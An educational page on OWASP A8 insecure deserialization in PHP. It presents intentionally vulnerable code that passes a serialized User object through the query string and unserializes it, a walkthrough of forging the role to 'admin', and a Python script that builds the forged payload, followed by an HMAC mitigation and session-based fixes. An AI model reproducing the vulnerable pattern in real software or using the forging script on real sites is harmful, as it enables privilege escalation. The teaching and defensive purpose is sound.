OWASP Top 10 - 2017 A8 Insecure Deserialization and Penetration Testing

This example illustrates an insecure deserialization vulnerability in PHP code, categorized as CWE-502: Deserialization of Untrusted Data.

User.php

<?php
// User.php: the class whose instances login.php serializes, hands to the
// client and profile.php later unserializes.
class User {
    public $username = "";
    public $role = "";

    public function displayRole() {
        echo $this->role;
    }
}

The user provides valid login credentials.

login.php

<?php
require_once 'User.php';

// $username and $role come from the credential check that precedes this
// snippet (not shown on the page).

// Create the User object
$user = new User;
$user->username = $username;
$user->role = $role;

// PHP object serialization: the whole object, role included, is handed to
// the client in a form it can read and rewrite
$data = base64_encode(serialize($user));

// Redirect, carrying the serialized object in the query string
header('Location: profile.php?data='.$data);
exit;

Initially, the user “test” is denied access.

profile.php

<?php
require_once 'User.php'; // without the class loaded, unserialize() returns a __PHP_Incomplete_Class

// Vulnerable: client-controlled input goes straight into unserialize()
$data = $_GET['data'];
$data = base64_decode($data);
$data = unserialize($data);

$username = $data->username;
$role = $data->role;

// The role is trusted as received; nothing ties this object to the one login.php issued
if($role == "admin"){
  //action here
}

The “data” parameter, containing a base64-encoded serialized PHP object, is captured (for example with an intercepting proxy). For the user “test” with role “user”, decoding it gives:

O:4:"User":2:{s:8:"username";s:4:"test";s:4:"role";s:4:"user";}

The serialized object is modified to change the user’s role from “user” to “admin”. The string length prefix has to change with the value (s:4:"user" becomes s:5:"admin"), because unserialize() reads exactly the declared number of bytes and rejects a payload whose lengths do not match. The result is base64-encoded again.

The manipulated base64 value is sent as the “data” parameter to profile.php.

The user is now recognized as an administrator: profile.php accepts whatever role the client supplies, since it never checks that the object it unserializes is the one login.php issued.
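The manipulation above, carried through in Python as an added example (this is not code from the original page): it rewrites the role inside the captured payload while keeping the PHP serialization format valid, shows why a plain text edit that leaves the length prefix alone produces a payload unserialize() would reject, and, as one mitigation the page itself does not show, tags the blob with an HMAC so that a tampered value is refused before it is unserialized. The sample payload is constructed from the page's User class with username "test" and role "user"; the server key and all function names are assumptions made for the example.

```python
import base64
import hashlib
import hmac
import re

# Constructed sample: what login.php on this page emits for username "test"
# with role "user" (PHP serialize() output for the User class, base64-encoded).
ORIGINAL_SERIALIZED = (
    b'O:4:"User":2:{s:8:"username";s:4:"test";s:4:"role";s:4:"user";}'
)
ORIGINAL_DATA_PARAM = base64.b64encode(ORIGINAL_SERIALIZED).decode()

# A serialized PHP string token starts with s:<byte length>:"
STRING_TOKEN = re.compile(rb's:(\d+):"')


def php_serialize_string(value: str) -> bytes:
    """Serialize one string the way PHP does: s:<byte length>:"<value>";"""
    raw = value.encode("utf-8")
    return b's:%d:"%s";' % (len(raw), raw)


def set_string_property(serialized: bytes, name: str, new_value: str) -> bytes:
    """Replace the string-valued property `name` inside a serialized PHP object.

    unserialize() reads exactly the declared number of bytes, so the length
    prefix of the new value is recomputed rather than just swapping the text.
    """
    key = php_serialize_string(name)
    idx = serialized.find(key)
    if idx == -1:
        raise ValueError(f"property {name!r} not found")
    value_start = idx + len(key)
    m = STRING_TOKEN.match(serialized, value_start)
    if not m:
        raise ValueError("only string-valued properties are handled")
    value_end = m.end() + int(m.group(1)) + len(b'";')
    return serialized[:value_start] + php_serialize_string(new_value) + serialized[value_end:]


def forge_admin_serialized(data_param: str) -> bytes:
    """Decode the captured ?data= value and rewrite its role to admin."""
    return set_string_property(base64.b64decode(data_param), "role", "admin")


def forge_admin_param(data_param: str) -> str:
    """The forged value to send back to profile.php as ?data=."""
    return base64.b64encode(forge_admin_serialized(data_param)).decode()


def naive_edit_serialized(data_param: str) -> bytes:
    """What a plain text edit produces: the value changes, the prefix still says 4."""
    return base64.b64decode(data_param).replace(b'"user"', b'"admin"')


def string_tokens_consistent(serialized: bytes) -> bool:
    """Mimic unserialize()'s strictness on string tokens: after each s:N:"
    there must be exactly N bytes followed by '";'."""
    pos = 0
    while True:
        m = STRING_TOKEN.search(serialized, pos)
        if m is None:
            return True
        value_end = m.end() + int(m.group(1))
        if serialized[value_end:value_end + 2] != b'";':
            return False
        pos = value_end + 2


# Assumed server-side secret for the mitigation below; it never leaves the server.
SERVER_KEY = b"replace-with-a-random-server-secret"


def sign_param(data_param: str) -> str:
    """Tag the serialized blob before login.php hands it to the client."""
    return hmac.new(SERVER_KEY, data_param.encode(), hashlib.sha256).hexdigest()


def verify_param(data_param: str, tag: str) -> bool:
    """profile.php-side check: refuse to unserialize unless the tag matches."""
    return hmac.compare_digest(sign_param(data_param), tag)


if __name__ == "__main__":
    tag = sign_param(ORIGINAL_DATA_PARAM)
    forged = forge_admin_param(ORIGINAL_DATA_PARAM)
    print("captured :", ORIGINAL_SERIALIZED.decode())
    print("forged   :", forge_admin_serialized(ORIGINAL_DATA_PARAM).decode())
    print("naive edit parses :", string_tokens_consistent(naive_edit_serialized(ORIGINAL_DATA_PARAM)))
    print("forged passes HMAC:", verify_param(forged, tag))
```

The HMAC tag stops the role rewrite, but it only proves the blob came from the server; any bug that lets an attacker obtain a signed blob, or the key, reopens the problem, and unserialize() on attacker-influenced bytes remains a gadget-chain risk. The stronger fix is to keep the role in the server-side session and never unserialize client-supplied data at all; if something must round-trip through the client, use a plain data format such as JSON decoded into an array.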

Reference:
https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization
https://cwe.mitre.org/data/definitions/502.html

Licensed under CC BY-NC-SA 4.0
Last updated on May 09, 2023 06:43 +0100